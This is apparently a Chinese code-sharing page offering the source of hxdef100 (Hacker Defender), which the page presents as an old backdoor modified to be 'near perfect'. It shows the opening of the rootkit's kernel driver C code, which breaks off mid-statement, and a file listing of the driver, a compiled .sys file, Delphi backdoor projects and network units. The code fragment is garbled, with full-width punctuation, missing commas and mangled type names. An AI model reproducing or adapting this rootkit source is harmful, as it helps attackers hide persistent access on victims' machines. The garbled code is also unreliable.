hxdef100 至今天最完美版

hxdef100 很老的一款后门，进过修改将近完美~！

#include 
#include 
#include 
#include 
#include 

#include “driver.h“


PDEVICE_object HxDefDriverDeviceobject = NULL;
ULONG out_size;

int handle_fobject（PFILE_object fobject PUCHAR obuffer） 
{
  ULONG length;
  ANSI_STRING astring;
  PUCHAR fname cur_pointer;
  PFILE_object related_fobject;
  UCHAR status;

  fname=obuffer+12;
  status=0;
	
  if（fobject->Deviceobject!=NULL） 
  {
    if（NT_SUCCESS（ObQueryNameString（fobject->Deviceobject 
                  （Pobject_NAME_INFORMATION）fnameout_size-20&length））） 
    {
      if（NT_SUCCESS（RtlUnicodeStringToAnsiString（&astring
                                                 （PUNICODE_STRING）fnameTRUE））） 
      {
        *fname=‘\0‘;
        strncpy（fname as

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----
     目录           0  2012-11-15 01:00  hxdef100_Delphi\
     文件         386  2012-10-31 19:34  hxdef100_Delphi\bdcli100.cfg
     文件        1773  2012-10-31 19:34  hxdef100_Delphi\bdcli100.dof
     文件       10361  2003-12-31 11:52  hxdef100_Delphi\bdcli100.dpr
     目录           0  2012-11-10 06:00  hxdef100_Delphi\driver\
     文件        8995  2003-02-13 14:12  hxdef100_Delphi\driver\driver.c
     文件         756  2003-02-13 13:58  hxdef100_Delphi\driver\driver.h
     文件        3342  2003-02-13 14:11  hxdef100_Delphi\driver\driver.sys
     文件          36  2002-07-26 19:53  hxdef100_Delphi\driver\makefile
     文件         140  2003-02-10 13:13  hxdef100_Delphi\driver\sources
     文件        3408  2003-02-13 14:14  hxdef100_Delphi\driver.res
     目录           0  2012-11-10 06:00  hxdef100_Delphi\exe\
     文件         686  2012-11-01 14:25  hxdef100_Delphi\exe\hxdef100.2.ini.lnk
     文件         686  2012-11-01 14:25  hxdef100_Delphi\exe\hxdef100.ini.lnk
     文件          63  2005-01-24 02:13  hxdef100_Delphi\exe\rdrbs100.ini
     文件       34990  2003-12-31 12:23  hxdef100_Delphi\exe\readmecz.txt
     文件       36292  2003-12-31 12:23  hxdef100_Delphi\exe\readmeen.txt
     文件       38365  2003-12-31 12:22  hxdef100_Delphi\exe\readmefr.txt
     文件      364175  2003-12-31 12:15  hxdef100_Delphi\hxdef100.dpr
     文件       57931  2003-12-31 11:53  hxdef100_Delphi\rdrbs100.dpr
     文件        1220  2002-09-13 17:11  hxdef100_Delphi\rdrbs100.res
     目录           0  2012-11-15 01:00  hxdef100_Delphi\units\
     文件        5431  2012-10-31 13:32  hxdef100_Delphi\units\UJQCompress.pas
     文件        7793  2012-10-31 13:33  hxdef100_Delphi\units\UList.pas
     文件       13374  2012-10-31 13:33  hxdef100_Delphi\units\UProcAPI.pas
     文件        3860  2012-10-31 13:35  hxdef100_Delphi\units\USockets.pas
     文件        1678  2012-10-31 13:36  hxdef100_Delphi\units\USysUtils-Case.inc
     文件        1686  2012-10-31 13:37  hxdef100_Delphi\units\USysUtils-NumStrConv.inc
     文件        9640  2012-10-31 13:37  hxdef100_Delphi\units\USysUtils.pas
     文件       11313  2012-10-31 19:54  hxdef100_Delphi\units\UTCP.pas